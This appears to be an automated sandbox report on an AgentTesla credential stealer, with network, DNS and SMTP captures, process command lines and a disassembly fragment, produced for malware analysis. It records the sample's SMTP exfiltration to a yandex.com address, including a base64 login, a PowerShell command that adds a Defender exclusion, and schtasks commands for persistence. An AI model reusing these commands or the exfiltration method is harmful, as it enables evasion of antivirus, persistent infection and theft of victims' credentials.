                                                                                                                                    Feb 9, 2023 19:40:49.156883001 CET44349718173.231.16.76192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:49.156956911 CET49718443192.168.2.7173.231.16.76
                                                                                                                                    Feb 9, 2023 19:40:49.158757925 CET49718443192.168.2.7173.231.16.76
                                                                                                                                    Feb 9, 2023 19:40:58.939591885 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:58.963145971 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:58.963294983 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.003160000 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.009274960 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.034955025 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.035612106 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.059699059 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.060187101 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.099977970 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.106488943 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.130882978 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.132616997 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.173305988 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.181783915 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.205737114 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.205801964 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.212357044 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.212438107 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.212482929 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.212526083 CET49721587192.168.2.788.99.90.21
                                                                                                                                    Feb 9, 2023 19:40:59.235944033 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.238378048 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.245584965 CET5874972188.99.90.21192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:59.426331997 CET49721587192.168.2.788.99.90.21

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Feb 9, 2023 19:40:24.502187014 CET6117853192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:24.524148941 CET53611788.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:24.555389881 CET6392653192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:24.576765060 CET53639268.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.327800035 CET5333653192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:34.389697075 CET53533368.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:34.394052029 CET5100753192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:34.564606905 CET53510078.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:46.467117071 CET6076553192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:46.489089966 CET53607658.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:46.497050047 CET5828353192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:46.514812946 CET53582838.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:58.832264900 CET6267953192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:58.851946115 CET53626798.8.8.8192.168.2.7
                                                                                                                                    Feb 9, 2023 19:40:58.871776104 CET6139253192.168.2.78.8.8.8
                                                                                                                                    Feb 9, 2023 19:40:58.938018084 CET53613928.8.8.8192.168.2.7

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Feb 9, 2023 19:40:24.502187014 CET192.168.2.78.8.8.80xdfe7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:24.555389881 CET192.168.2.78.8.8.80x3aeaStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:34.327800035 CET192.168.2.78.8.8.80xf42fStandard query (0)mail.keefort.com.ecA (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:34.394052029 CET192.168.2.78.8.8.80x17dcStandard query (0)mail.keefort.com.ecA (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:46.467117071 CET192.168.2.78.8.8.80x8431Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:46.497050047 CET192.168.2.78.8.8.80x82f3Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:58.832264900 CET192.168.2.78.8.8.80xd65bStandard query (0)mail.keefort.com.ecA (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:58.871776104 CET192.168.2.78.8.8.80xf7d6Standard query (0)mail.keefort.com.ecA (IP address)IN (0x0001)false

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Feb 9, 2023 19:40:24.524148941 CET8.8.8.8192.168.2.70xdfe7No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:24.524148941 CET8.8.8.8192.168.2.70xdfe7No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:24.524148941 CET8.8.8.8192.168.2.70xdfe7No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:24.524148941 CET8.8.8.8192.168.2.70xdfe7No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:24.576765060 CET8.8.8.8192.168.2.70x3aeaNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:24.576765060 CET8.8.8.8192.168.2.70x3aeaNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:24.576765060 CET8.8.8.8192.168.2.70x3aeaNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:24.576765060 CET8.8.8.8192.168.2.70x3aeaNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:34.389697075 CET8.8.8.8192.168.2.70xf42fNo error (0)mail.keefort.com.eckeefort.com.ecCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:34.389697075 CET8.8.8.8192.168.2.70xf42fNo error (0)keefort.com.ec88.99.90.21A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:34.564606905 CET8.8.8.8192.168.2.70x17dcNo error (0)mail.keefort.com.eckeefort.com.ecCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:34.564606905 CET8.8.8.8192.168.2.70x17dcNo error (0)keefort.com.ec88.99.90.21A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:46.489089966 CET8.8.8.8192.168.2.70x8431No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:46.489089966 CET8.8.8.8192.168.2.70x8431No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:46.489089966 CET8.8.8.8192.168.2.70x8431No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:46.489089966 CET8.8.8.8192.168.2.70x8431No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:46.514812946 CET8.8.8.8192.168.2.70x82f3No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:46.514812946 CET8.8.8.8192.168.2.70x82f3No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:46.514812946 CET8.8.8.8192.168.2.70x82f3No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:46.514812946 CET8.8.8.8192.168.2.70x82f3No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:58.851946115 CET8.8.8.8192.168.2.70xd65bNo error (0)mail.keefort.com.eckeefort.com.ecCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:58.851946115 CET8.8.8.8192.168.2.70xd65bNo error (0)keefort.com.ec88.99.90.21A (IP address)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:58.938018084 CET8.8.8.8192.168.2.70xf7d6No error (0)mail.keefort.com.eckeefort.com.ecCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Feb 9, 2023 19:40:58.938018084 CET8.8.8.8192.168.2.70xf7d6No error (0)keefort.com.ec88.99.90.21A (IP address)IN (0x0001)false

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • api.ipify.org

                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.2.749715104.237.62.211443C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2023-02-09 18:40:25 UTC0OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                    Host: api.ipify.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2023-02-09 18:40:25 UTC0INHTTP/1.1 200 OK
                                                                                                                                    Content-Length: 11
                                                                                                                                    Content-Type: text/plain
                                                                                                                                    Date: Thu, 09 Feb 2023 18:40:25 GMT
                                                                                                                                    Vary: Origin
                                                                                                                                    Connection: close
                                                                                                                                    2023-02-09 18:40:25 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
                                                                                                                                    Data Ascii: 84.17.52.13


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    1192.168.2.749718173.231.16.76443C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2023-02-09 18:40:48 UTC0OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                    Host: api.ipify.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2023-02-09 18:40:49 UTC0INHTTP/1.1 200 OK
                                                                                                                                    Content-Length: 11
                                                                                                                                    Content-Type: text/plain
                                                                                                                                    Date: Thu, 09 Feb 2023 18:40:49 GMT
                                                                                                                                    Vary: Origin
                                                                                                                                    Connection: close
                                                                                                                                    2023-02-09 18:40:49 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
                                                                                                                                    Data Ascii: 84.17.52.13


                                                                                                                                    SMTP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                    Feb 9, 2023 19:40:34.706062078 CET5874971688.99.90.21192.168.2.7220-srv18.mihosting.com ESMTP Exim 4.95 #2 Thu, 09 Feb 2023 18:40:34 +0000
                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                    Feb 9, 2023 19:40:34.706923962 CET49716587192.168.2.788.99.90.21EHLO 376483
                                                                                                                                    Feb 9, 2023 19:40:34.732095003 CET5874971688.99.90.21192.168.2.7250-srv18.mihosting.com Hello 376483 [84.17.52.13]
                                                                                                                                    250-SIZE 52428800
                                                                                                                                    250-8BITMIME
                                                                                                                                    250-PIPELINING
                                                                                                                                    250-PIPE_CONNECT
                                                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                                                    250-STARTTLS
                                                                                                                                    250 HELP
                                                                                                                                    Feb 9, 2023 19:40:34.733659029 CET49716587192.168.2.788.99.90.21AUTH login c3NnQGtlZWZvcnQuY29tLmVj
                                                                                                                                    Feb 9, 2023 19:40:34.757739067 CET5874971688.99.90.21192.168.2.7334 UGFzc3dvcmQ6
                                                                                                                                    Feb 9, 2023 19:40:34.912858963 CET5874971688.99.90.21192.168.2.7235 Authentication succeeded
                                                                                                                                    Feb 9, 2023 19:40:34.913141966 CET49716587192.168.2.788.99.90.21MAIL FROM:<ssg@keefort.com.ec>
                                                                                                                                    Feb 9, 2023 19:40:34.939181089 CET5874971688.99.90.21192.168.2.7250 OK
                                                                                                                                    Feb 9, 2023 19:40:34.939482927 CET49716587192.168.2.788.99.90.21RCPT TO:<s4tivar@yandex.com>
                                                                                                                                    Feb 9, 2023 19:40:34.973017931 CET5874971688.99.90.21192.168.2.7250 Accepted
                                                                                                                                    Feb 9, 2023 19:40:34.973248959 CET49716587192.168.2.788.99.90.21DATA
                                                                                                                                    Feb 9, 2023 19:40:34.996709108 CET5874971688.99.90.21192.168.2.7354 Enter message, ending with "." on a line by itself
                                                                                                                                    Feb 9, 2023 19:40:35.013189077 CET49716587192.168.2.788.99.90.21.
                                                                                                                                    Feb 9, 2023 19:40:35.045454025 CET5874971688.99.90.21192.168.2.7250 OK id=1pQBqU-00C1SA-SL
                                                                                                                                    Feb 9, 2023 19:40:59.003160000 CET5874972188.99.90.21192.168.2.7220-srv18.mihosting.com ESMTP Exim 4.95 #2 Thu, 09 Feb 2023 18:40:58 +0000
                                                                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                    220 and/or bulk e-mail.
                                                                                                                                    Feb 9, 2023 19:40:59.009274960 CET49721587192.168.2.788.99.90.21EHLO 376483
                                                                                                                                    Feb 9, 2023 19:40:59.034955025 CET5874972188.99.90.21192.168.2.7250-srv18.mihosting.com Hello 376483 [84.17.52.13]
                                                                                                                                    250-SIZE 52428800
                                                                                                                                    250-8BITMIME
                                                                                                                                    250-PIPELINING
                                                                                                                                    250-PIPE_CONNECT
                                                                                                                                    250-AUTH PLAIN LOGIN
                                                                                                                                    250-STARTTLS
                                                                                                                                    250 HELP
                                                                                                                                    Feb 9, 2023 19:40:59.035612106 CET49721587192.168.2.788.99.90.21AUTH login c3NnQGtlZWZvcnQuY29tLmVj
                                                                                                                                    Feb 9, 2023 19:40:59.059699059 CET5874972188.99.90.21192.168.2.7334 UGFzc3dvcmQ6
                                                                                                                                    Feb 9, 2023 19:40:59.099977970 CET5874972188.99.90.21192.168.2.7235 Authentication succeeded
                                                                                                                                    Feb 9, 2023 19:40:59.106488943 CET49721587192.168.2.788.99.90.21MAIL FROM:<ssg@keefort.com.ec>
                                                                                                                                    Feb 9, 2023 19:40:59.130882978 CET5874972188.99.90.21192.168.2.7250 OK
                                                                                                                                    Feb 9, 2023 19:40:59.132616997 CET49721587192.168.2.788.99.90.21RCPT TO:<s4tivar@yandex.com>
                                                                                                                                    Feb 9, 2023 19:40:59.173305988 CET5874972188.99.90.21192.168.2.7250 Accepted
                                                                                                                                    Feb 9, 2023 19:40:59.181783915 CET49721587192.168.2.788.99.90.21DATA
                                                                                                                                    Feb 9, 2023 19:40:59.205801964 CET5874972188.99.90.21192.168.2.7354 Enter message, ending with "." on a line by itself
                                                                                                                                    Feb 9, 2023 19:40:59.212526083 CET49721587192.168.2.788.99.90.21.
                                                                                                                                    Feb 9, 2023 19:40:59.245584965 CET5874972188.99.90.21192.168.2.7250 OK id=1pQBqt-00C1XK-2p

                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:19:40:05
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    Imagebase:0x1b0000
                                                                                                                                    File size:791552 bytes
                                                                                                                                    MD5 hash:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:low

                                                                                                                                    General

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:19:40:12
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    Imagebase:0xe60000
                                                                                                                                    File size:430592 bytes
                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:19:40:12
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6edaf0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:19:40:13
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Imagebase:0xe60000
                                                                                                                                    File size:430592 bytes
                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:19:40:13
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6edaf0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:19:40:13
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp
                                                                                                                                    Imagebase:0xe10000
                                                                                                                                    File size:185856 bytes
                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Target ID:6
                                                                                                                                    Start time:19:40:13
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6edaf0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Target ID:7
                                                                                                                                    Start time:19:40:16
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Imagebase:0xb0000
                                                                                                                                    File size:791552 bytes
                                                                                                                                    MD5 hash:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:low

                                                                                                                                    General

                                                                                                                                    Target ID:8
                                                                                                                                    Start time:19:40:17
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    Imagebase:0x760000
                                                                                                                                    File size:791552 bytes
                                                                                                                                    MD5 hash:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low

                                                                                                                                    General

                                                                                                                                    Target ID:17
                                                                                                                                    Start time:19:40:37
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmpC6BA.tmp
                                                                                                                                    Imagebase:0xe10000
                                                                                                                                    File size:185856 bytes
                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Target ID:18
                                                                                                                                    Start time:19:40:38
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6edaf0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Target ID:19
                                                                                                                                    Start time:19:40:38
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Imagebase:0x1e0000
                                                                                                                                    File size:791552 bytes
                                                                                                                                    MD5 hash:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Target ID:20
                                                                                                                                    Start time:19:40:40
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Imagebase:0xb60000
                                                                                                                                    File size:791552 bytes
                                                                                                                                    MD5 hash:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                    Disassembly

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:14.1%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:236
                                                                                                                                      Total number of Limit Nodes:10
                                                                                                                                      execution_graph 16949 ab9cb8 16953 ab9da0 16949->16953 16961 ab9db0 16949->16961 16950 ab9cc7 16954 ab9da4 16953->16954 16955 ab9ddb 16954->16955 16969 aba038 16954->16969 16973 aba028 16954->16973 16955->16950 16956 ab9dd3 16956->16955 16957 ab9fd8 GetModuleHandleW 16956->16957 16958 aba005 16957->16958 16958->16950 16962 ab9db2 16961->16962 16963 ab9ddb 16962->16963 16967 aba028 LoadLibraryExW 16962->16967 16968 aba038 LoadLibraryExW 16962->16968 16963->16950 16964 ab9dd3 16964->16963 16965 ab9fd8 GetModuleHandleW 16964->16965 16966 aba005 16965->16966 16966->16950 16967->16964 16968->16964 16970 aba03a 16969->16970 16971 aba071 16970->16971 16977 ab9a98 16970->16977 16971->16956 16974 aba038 16973->16974 16975 ab9a98 LoadLibraryExW 16974->16975 16976 aba071 16974->16976 16975->16976 16976->16956 16978 aba218 LoadLibraryExW 16977->16978 16980 aba291 16978->16980 16980->16971 16981 abc2d8 DuplicateHandle 16982 abc36e 16981->16982 16983 27c6208 16984 27c6235 16983->16984 17015 27c5c20 16984->17015 16990 27c62c7 16991 27c5c30 4 API calls 16990->16991 16992 27c62f9 16991->16992 16993 27c5c40 4 API calls 16992->16993 16994 27c632b 16993->16994 16995 27c5c40 4 API calls 16994->16995 16996 27c635d 16995->16996 16997 27c5c40 4 API calls 16996->16997 16998 27c638f 16997->16998 16999 27c5c30 4 API calls 16998->16999 17000 27c63c1 16999->17000 17001 27c5c40 4 API calls 17000->17001 17002 27c63f3 17001->17002 17003 27c5c20 4 API calls 17002->17003 17004 27c6425 17003->17004 17005 27c5c40 4 API calls 17004->17005 17006 27c6457 17005->17006 17007 27c5c20 4 API calls 17006->17007 17008 27c6489 17007->17008 17009 27c5c40 4 API calls 17008->17009 17010 27c6551 17009->17010 17011 27c5c30 4 API calls 17010->17011 17012 27c6871 17011->17012 17013 27c5c40 4 API calls 17012->17013 17014 27c68a3 17013->17014 17016 27c5c2b 17015->17016 17028 27c5f18 17016->17028 17018 27c6263 17019 27c5c30 17018->17019 17020 27c5c3b 17019->17020 17122 27c60b8 17020->17122 17022 27c6295 17023 27c5c40 17022->17023 17024 27c5c4b 17023->17024 17026 ab7810 4 API calls 17024->17026 17027 ab6e34 4 API calls 17024->17027 17025 27cfe23 17025->16990 17026->17025 17027->17025 17029 27c5f23 17028->17029 17033 ab7810 17029->17033 17040 ab6e34 17029->17040 17030 27c8dcc 17030->17018 17034 ab7815 17033->17034 17036 ab7abe 17034->17036 17047 27c8e60 17034->17047 17050 27cf950 17034->17050 17035 ab7afc 17035->17030 17036->17035 17053 abb9d0 17036->17053 17041 ab6e3f 17040->17041 17043 ab7abe 17041->17043 17044 27c8e60 3 API calls 17041->17044 17045 27cf950 3 API calls 17041->17045 17042 ab7afc 17042->17030 17043->17042 17046 